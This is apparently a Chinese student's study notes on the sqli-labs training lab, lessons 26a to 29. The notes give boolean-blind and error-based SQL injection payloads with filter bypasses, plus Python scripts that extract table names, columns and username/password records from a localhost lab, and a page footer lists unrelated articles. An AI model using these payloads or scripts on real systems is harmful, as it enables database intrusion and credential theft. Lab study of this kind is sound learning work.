sqli-labs学习笔记 DAY5
DAY 5
sqli-labs lesson 26a
- 闭合符号为单引号和括号,并且不回显错误,如果服务器是Linux,尝试%a0代替空格,这里尝试使用布尔型
- 数据库名长度:?id=1’)&&if(length(database())=8,1,0)||('0
- 爆库:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0
- 爆表:
- 当返回为真,长度为914,返回为假,长度为863
- 编写Python脚本辅助解题:
#coding:utf-8 import urllib print "26a" url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270" html = urllib.urlopen(url).read() pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26" end_url = "||(%270" # condition = "" # payload = "if((" + condition + "),1,0)" from_ = "infoorrmation_schema.tables" where = "table_schema='security'" select = "select(group_concat(table_name))from(" + from_ + ")where(" + where + ")" result = [] for pos in range(1,100): # 判断出界 condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(127) payload = "if((" + condition + "),1,0)" url = pre_url + payload + end_url if "Your Login name" in urllib.urlopen(url).read(): print "".join(result) exit() # 没有出界 asc1 = 32 asc2 = 127 while not asc1 >= asc2: # 判断出界 condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2) payload = "if((" + condition + "),1,0)" url = pre_url + payload + end_url # print url if "Your Login name" in urllib.urlopen(url).read(): asc1 = (asc1+asc2)//2 + 1 else: asc2 = (asc1+asc2)//2 result.append(chr(asc1)) print "".join(result)
- 爆字段:
#coding:utf-8
import urllib
print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "infoorrmation_schema.columns"
where = "table_schema='security'%26%26table_name='users'"
select = "select(group_concat(column_name))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
- 爆记录:
#coding:utf-8
import urllib
print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "users"
where = "1=1"
select = "select(group_concat(concat(username,passwoorrd)))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
注:最大破解长度可以更改
sqli-labs lesson 27
- 过滤了select、SELECT和Select等,直接报错注入
- 爆库:?id=1%27%26%26extractvalue(1,concat(0x7e,(database()),0x7e))||%27
- 爆表:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’)),0x7e))||’
- 爆字段:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_schema=‘security’%26%26table_name=‘users’)),0x7e))||’
- 爆记录:http://localhost/sqli-labs-master/Less-27/?id=1'%26%26extractvalue(1,concat(0x7e,mid((seLect(group_concat(concat_ws(',',username,password)))from(security.users)),position,length),0x7e))||%27
sqli-labs 27a
- 依然是盲注
- 注入点与闭合符号的检测:?id=1"%26%260||"0
- 爆库:
#coding:utf-8
import urllib
print "27a"
# url = "http://localhost/sqli-labs-master/Less-27/?id=1%22a)%26%26if(1,1,0)||(%220"
# html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-27a/?id=1%22%26%26"
end_url = "||%220"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "users"
where = "1=1"
# select = "seLect(group_concat(concat(username,password)))from(" + from_ + ")where(" + where + ")"
select = "database()"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
- 爆表,爆字段,爆记录:代码同lesson 26a,更改url即可
sqli-labs lesson 28
- 闭合符号为’),盲注与上一题同解
- 报错注入同lesson 27
sqli-labs lesson 28a
- 与lesson 28的盲注同解
sqli-labs lesson 29
- 什么是WAF:https://www.techbang.com/posts/1826-waf-web-host-bridge-is-falling-down
- 这题需要配置Tomcat服务器
- HPP:https://blog.csdn.net/whatday/article/details/54745713?utm_source=blogxgwz1
- 根据HPP,tomcat会过滤第一个参数,而Apache会处理第二个参数,所以参考lesson 1即可
sqli-labs学习笔记 DAY5的更多相关文章
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- Python学习笔记——Day5(转载)
python 编码转换 主要介绍了python的编码机制,unicode, utf-8, utf-16, GBK, GB2312,ISO-8859-1 等编码之间的转换. 常见的编码转换分为以下几种情 ...
- Python学习笔记-Day5
冒泡算法: 实现1: a = [,,,,,,,,,,,,,,] def bubble(badlist): sort = False while not sort: sort = True ): ]: ...
- Python学习笔记day5
模块 1.自定义模块 自定义模块就是在当前目录下创建__init__.py这个空文件,这样外面的程序才能识别此目录为模块包并导入 上图中libs目录下有__init__.py文件,index.py程序 ...
- 学习笔记day5:inline inline-block block区别
1. block元素可以包含block元素和inline元素:但inline元素只能包含inline元素.要注意的是这个是个大概的说法,每个特定的元素能包含的元素也是特定的,所以具体到个别元素上,这条 ...
- JS学习笔记Day5
一.变量的作用域 1.作用域:变量的作用范围 2.全局变量:变量在整个程序都是有效的(从程序开始到程序结束变量均有效)在函数体外部定义的变量都是全局变量:在函数体内部 没有用var定义的变量也有可能是 ...
- HTML学习笔记Day5
一.CSS属性 1.文本溢出是否“...”显示属性:text-overflow:clip(不显示省略标记)/ellipsis(文本溢出时“...”显示) 定义此属性有四个必要条件:1)须有容器宽度:w ...
- Python学习笔记 - day5 - 文件操作
Python文件操作 读写文件是最常见的IO操作,在磁盘上读写文件的功能都是由操作系统提供的,操作系统不允许普通的程序直接操作磁盘(大部分程序都需要间接的通过操作系统来完成对硬件的操作),所以,读写文 ...
- 商业爬虫学习笔记day5
一. 发送post请求 import requests url = "" # 发送post请求 data = { } response = requests.post(url, d ...
随机推荐
- 20165302 敏捷开发与XP实践作业
20165302 敏捷开发与XP实践实验报告 一.提交点一 1.实验要求 参考 http://www.cnblogs.com/rocedu/p/6371315.html#SECCODESTANDARD ...
- c++——inline内联函数
1 inline内联函数 C++中的const常量可以替代宏常数定义,如: const int A = 3; #define A 3 C++中是否有解决方案替代宏代码片段呢?(替代宏代码片段就可以 ...
- c++——对象的构造和析构函数、构造函数的分类及调用
1构造函数和析构函数的概念 有关构造函数 1构造函数定义及调用 1)C++中的类可以定义与类名相同的特殊成员函数,这种与类名相同的成员函数叫做构造函数: 2)构造函数在定义时可以有参数: 3)没有任何 ...
- PAT乙级1030
1030 完美数列 (25 分) 给定一个正整数数列,和正整数 p,设这个数列中的最大值是 M,最小值是 m,如果 M≤mp,则称这个数列是完美数列. 现在给定参数 p 和一些正整数,请你从中选择 ...
- 【VSC】我安装了哪些扩展插件
Nodejs gitk —— 版本实时比对 Debugger for Chrome —— 让 vscode 映射 chrome 的 debug功能,静态页面都可以用 vscode 来打断点调试. ...
- unlink与close关系
close和unlink.以前时候总是不太理解两者的区别,最近看到一篇博客比较详细地描述了二者的本质区别,这里我引用了它的原文. “每一个文件,都可以通过一个struct stat的结 ...
- Linux 内存使用方法详细解析
我是一名程序员,那么我在这里以一个程序员的角度来讲解Linux内存的使用. 一提到内存管理,我们头脑中闪出的两个概念,就是虚拟内存,与物理内存.这两个概念主要来自于linux内核的支持. Linux在 ...
- IOPS、带宽(band width)、吞吐量 (throughput)
SAN和NAS存储一般都具备2个评价指标:IOPS和带宽(throughput),两个指标互相独立又相互关联.体现存储系统性能的最主要指标是IOPS. IOPS (Input/Output Per ...
- vue实现两重列表集合,点击显示,点击隐藏的折叠效果,(默认显示集合最新一条数据,点击展开,显示集合所有数据)
效果图: 默认显示最新一条数据: 点击显示所有数据: 代码: 说明:这里主要是 这块用来控制显示或者隐藏 根据当前点击的 这个方法里传递的index 对应 isShow 数组里的index ,对 ...
- 用脚本js把结果转化为固定小数位的形式
function roundTo(base,precision) { var m=Math.pow(10,precision); var a=Math.round(base * m) / m; ret ...